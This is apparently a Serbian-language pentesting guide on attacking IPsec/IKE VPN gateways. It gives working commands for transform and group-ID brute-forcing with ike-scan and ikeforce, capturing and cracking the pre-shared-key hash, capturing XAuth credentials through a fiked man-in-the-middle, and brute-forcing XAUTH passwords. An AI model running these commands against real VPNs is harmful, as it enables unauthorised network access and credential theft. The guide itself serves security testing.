Try Hard Security Group

Join the Try Hard Security Discord Server!Discord

Osnovne Informacije

IPsec je široko prepoznat kao glavna tehnologija za obezbeđivanje komunikacije između mreža (LAN-to-LAN) i od udaljenih korisnika do mrežnog pristupnog čvora (udaljeni pristup), služeći kao osnova za rešenja preduzeća za VPN.

Uspostavljanje bezbednosne asocijacije (SA) između dve tačke upravlja IKE, koji funkcioniše pod okriljem ISAKMP, protokola dizajniranog za autentifikaciju i razmenu ključeva. Ovaj proces se odvija u nekoliko faza:

• Faza 1: Bezbedan kanal se kreira između dve tačke. To se postiže korišćenjem Pre-Shared Key (PSK) ili sertifikata, koristeći ili glavni režim, koji uključuje tri para poruka, ili agresivni režim.

• Faza 1.5: Iako nije obavezna, ova faza, poznata kao Faza Proširene Autentifikacije, proverava identitet korisnika koji pokušava da se poveže zahtevajući korisničko ime i lozinku.

• Faza 2: Ova faza je posvećena pregovaranju parametara za obezbeđivanje podataka sa ESP i AH. To omogućava korišćenje algoritama različitih od onih u Fazi 1 kako bi se osigurala Savršena Progresivna Tajnost (PFS), poboljšavajući bezbednost.

Podrazumevani port: 500/udp

Otkrijte uslugu korišćenjem nmap

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

Pronalaženje validne transformacije

IPSec konfiguracija može biti podešena da prihvati samo jednu ili nekoliko transformacija. Transformacija je kombinacija vrednosti. Svaka transformacija sadrži broj atributa kao što su DES ili 3DES kao algoritam šifrovanja, SHA ili MD5 kao algoritam celovitosti, prethodno deljeni ključ kao tip autentikacije, Diffie-Hellman 1 ili 2 kao algoritam za distribuciju ključeva i 28800 sekundi kao životni vek.

Zatim, prva stvar koju treba da uradite je da pronađete validnu transformaciju, tako da će server komunicirati sa vama. Za to možete koristiti alat ike-scan. Podrazumevano, Ike-scan radi u glavnom režimu i šalje paket ka ulaznoj tački sa ISAKMP zaglavljem i jednim predlogom sa osam transformacija unutar njega.

Na osnovu odgovora možete dobiti neke informacije o krajnjoj tački:

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

Kao što možete videti u prethodnom odgovoru, postoji polje nazvano AUTH sa vrednošću PSK. To znači da je VPN konfigurisan korišćenjem unapred podele ključa (i ovo je zaista dobro za pentestera). Vrednost poslednje linije je takođe veoma važna:

• 0 vraćen handshake; 0 vraćen notify: Ovo znači da meta nije IPsec gateway.

• 1 vraćen handshake; 0 vraćen notify: Ovo znači da je meta konfigurisana za IPsec i spremna je da obavi IKE pregovore, i da je jedna ili više transformacija koje ste predložili prihvatljiva (važeća transformacija će biti prikazana u izlazu).

• 0 vraćen handshake; 1 vraćen notify: VPN gateway-ovi odgovaraju sa notify porukom kada nijedna od transformacija nije prihvatljiva (mada neki gateway-ovi to ne rade, u tom slučaju treba izvršiti dalju analizu i probati sa revidiranim predlogom).

Dakle, u ovom slučaju već imamo važeću transformaciju, ali ako se nalazite u 3. slučaju, tada morate malčice probati sa brute-force-om da biste pronašli važeću transformaciju:

Prvo treba da kreirate sve moguće transformacije:

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

I zatim pokušajte da probijete svaki koristeći ike-scan (ovo može potrajati nekoliko minuta):

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

Ako brute-force nije uspeo, možda server odgovara bez rukovanja čak i na validne transformacije. Zatim, možete probati isti brute-force ali koristeći agresivni režim:

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

Nadam se da će važeća transformacija biti vraćena. Možete pokušati isti napad koristeći iker.py. Takođe možete pokušati da grubo forsirate transformacije sa ikeforce:

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

U DH grupi: 14 = 2048-bitni MODP i 15 = 3072-bitni 2 = HMAC-SHA = SHA1 (u ovom slučaju). Format --trans je $Enc,$Hash,$Auth,$DH

Cisco preporučuje izbegavanje korišćenja DH grupa 1 i 2 jer nisu dovoljno jake. Stručnjaci veruju da zemlje sa puno resursa lako mogu da probiju enkripciju podataka koji koriste ove slabe grupe. To se postiže korišćenjem posebnog metoda koji ih priprema da brzo probiju kodove. Iako košta puno novca postaviti ovaj metod, omogućava ovim moćnim zemljama da čitaju enkriptovane podatke u realnom vremenu ako koriste grupu koja nije jaka (kao što je 1.024-bitna ili manja).

Fingerprintiranje servera

Zatim, možete koristiti ike-scan da pokušate otkriti proizvođača uređaja. Alat šalje početni predlog i prestaje sa reprodukcijom. Zatim, analizira razliku u vremenu između primljenih poruka od servera i odgovarajućeg obrasca odgovora, pentester može uspešno identifikovati proizvođača VPN gateway-a. Osim toga, neki VPN serveri će koristiti opcioni Vendor ID (VID) payload sa IKE.

Navedite validnu transformaciju ako je potrebno (koristeći --trans)

Ako IKE otkrije koji je proizvođač, isprintaće ga:

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

Ovo može biti postignuto i sa nmap skriptom ike-version

Pronalaženje tačnog ID-a (imenovanje grupe)

Da biste bili u mogućnosti da uhvatite heš, potreban vam je validan transform koji podržava Agresivni režim i tačan ID (ime grupe). Verovatno nećete znati validno ime grupe, pa ćete morati da ga probate silom. Da biste to uradili, preporučio bih vam 2 metode:

Silom probijanje ID-a sa ike-scan

Prvo pokušajte da napravite zahtev sa lažnim ID-om pokušavajući da prikupite heš ("-P"):

ike-scan -P -M -A -n fakeID <IP>

Ako nema povratne vrednosti heša, tada će verovatno ovaj metod grubog forsiranja raditi. Ako se vrati neki heš, to znači da će se za lažni ID poslati lažni heš, pa ovaj metod neće biti pouzdan za grubo forsiranje ID-ja. Na primer, može se vratiti lažni heš (ovo se dešava u modernim verzijama):

Ali ako, kao što sam rekao, nema povratne vrednosti heša, tada biste trebali pokušati grubo forsirati uobičajena imena grupa koristeći ike-scan.

Ovaj skript će pokušati grubo forsirati moguće ID-jeve i vratiti će ID-jeve gde je vraćen validan handshake (ovo će biti validno ime grupe).

Ako ste otkrili određenu transformaciju, dodajte je u ike-scan komandu. Ako ste otkrili više transformacija slobodno dodajte novu petlju da ih sve isprobate (trebali biste ih isprobati sve dok jedna od njih pravilno radi).

Možete koristiti rečnik ikeforce ili onaj u seclists uobičajenih imena grupa da ih grubo forsirate:

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Bruteforcing ID with Iker

iker.py takođe koristi ike-scan za pokušaj otkrivanja mogućih imena grupa. Prati svoju metodu za pronalaženje validnog ID-a na osnovu izlaza ike-scan.

Bruteforcing ID with ikeforce

ikeforce.py je alat koji se može koristiti za bruteforce ID-ova takođe. Ovaj alat će pokušati iskoristiti različite ranjivosti koje bi mogle biti korištene za razlikovanje između validnog i nevalidnog ID-a (može imati lažne pozitivne i lažne negativne rezultate, zbog čega preferiram korišćenje metode ike-scan ako je moguće).

Podrazumevano, ikeforce će na početku poslati neke nasumične ID-ove kako bi proverio ponašanje servera i odredio taktiku koju će koristiti.

• Prva metoda je da brute-force imena grupa tražeći informacije Dead Peer Detection DPD Cisco sistema (ove informacije server emituje samo ako je ime grupe ispravno).

• Druga dostupna metoda je da proverava broj poslatih odgovora za svaki pokušaj jer se ponekad šalje više paketa kada se koristi ispravan ID.

• Treća metoda sastoji se od traženja "INVALID-ID-INFORMATION" u odgovoru na neispravan ID.

• Na kraju, ako server ne emituje ništa kao odgovor na provere, ikeforce će pokušati da brute-force server i proveri da li server emituje neki paket kada se pošalje ispravan ID. Očigledno, cilj brute force napada na ID je dobiti PSK kada imate validan ID. Zatim, sa ID-om i PSK-om moraćete da izvršite brute force napad na XAUTH (ako je omogućen).

Ako ste otkrili određenu transformaciju, dodajte je u ikeforce komandu. I ako ste otkrili više transformacija slobodno dodajte novu petlju da ih sve isprobate (trebalo bi da ih isprobate sve dok jedna od njih pravilno funkcioniše).

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library

./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

Sniffing ID

(Iz knjige Procena bezbednosti mreže: Upoznajte svoju mrežu): Takođe je moguće dobiti validna korisnička imena špijuniranjem veze između VPN klijenta i servera, jer se prvi paket agresivnog moda koji sadrži ID klijenta šalje otvoreno

Snimanje i dešifrovanje heša

Na kraju, ako ste pronašli validnu transformaciju i ime grupe i ako je agresivni mod dozvoljen, tada možete veoma lako uhvatiti dešifrovan heš:

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

Hash će biti sačuvan unutar hash.txt.

Možete koristiti psk-crack, john (koristeći ikescan2john.py) i hashcat da provalite hash:

psk-crack -d <Wordlist_path> psk.txt

XAuth

Agresivni režim IKE u kombinaciji sa Pre-Shared Key (PSK) se često koristi u svrhu grupne autentikacije. Ovaj metod se proširuje sa XAuth (Proširena autentikacija), koja služi da uvede dodatni sloj korisničke autentikacije. Takva autentikacija obično koristi usluge poput Microsoft Active Directory, RADIUS, ili sličnih sistema.

Prelaskom na IKEv2, primećuje se značajna promena gde se koristi EAP (Proširivi protokol za autentikaciju) umesto XAuth u svrhu autentikacije korisnika. Ova promena ističe evoluciju praksi autentikacije unutar sigurnih komunikacionih protokola.

MitM napad na lokalnu mrežu za hvatanje akreditiva

Tako da možete uhvatiti podatke za prijavljivanje koristeći fiked i videti da li postoji neko podrazumevano korisničko ime (Morate preusmeriti IKE saobraćaj na fiked za špijuniranje, što se može uraditi uz pomoć ARP prevara, više informacija). Fiked će delovati kao VPN krajnja tačka i uhvatiće XAuth akreditive:

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

Napad snimanja sa čoveka usred tunela IPSec-a i blokiranje saobraćaja ka portu 500

Takođe, pokušajte da izvršite napad snimanja sa čoveka korišćenjem IPSec-a i blokirajte sav saobraćaj ka portu 500, ako tunel IPSec ne može da bude uspostavljen, možda će saobraćaj biti poslat nešifrovan.

Brute-forcing XAUTH korisničko ime i lozinku pomoću ikeforce

Da biste primenili XAUTH metodu (kada znate validno ime grupe id i psk), možete koristiti korisničko ime ili listu korisničkih imena i listu lozinki:

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

Ovako, ikeforce će pokušati da se poveže koristeći svaku kombinaciju korisničko ime:lozinka.

Ako pronađete jednu ili više validnih transformacija, jednostavno ih koristite kao u prethodnim koracima.

Autentikacija putem IPSEC VPN-a

U Kali-u, VPNC se koristi za uspostavljanje IPsec tunela. Profili se moraju nalaziti u direktorijumu /etc/vpnc/. Možete pokrenuti ove profile koristeći komandu vpnc.

Naredbe i konfiguracije u nastavku ilustruju proces postavljanja VPN veze pomoću VPNC-a:

root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0

U ovom postavci:

• Zamijenite [VPN_GATEWAY_IP] stvarnom IP adresom VPN gateway-a.

• Zamijenite [VPN_CONNECTION_ID] sa identifikatorom VPN veze.

• Zamijenite [VPN_GROUP_SECRET] sa grupnim tajnim ključem VPN-a.

• Zamijenite [VPN_USERNAME] i [VPN_PASSWORD] sa autentifikacionim podacima VPN-a.

• [PID] simbolizuje ID procesa koji će biti dodeljen kada vpnc pokrene.

Obezbedite da se stvarne, sigurne vrednosti koriste za zamenu oznaka prilikom konfigurisanja VPN-a.

Reference Materijal

• PSK cracking rad

• SecurityFocus Infocus

• Skeniranje VPN implementacije

• Network Security Assessment 3. izdanje

Shodan

• port:500 IKE

Try Hard Security Group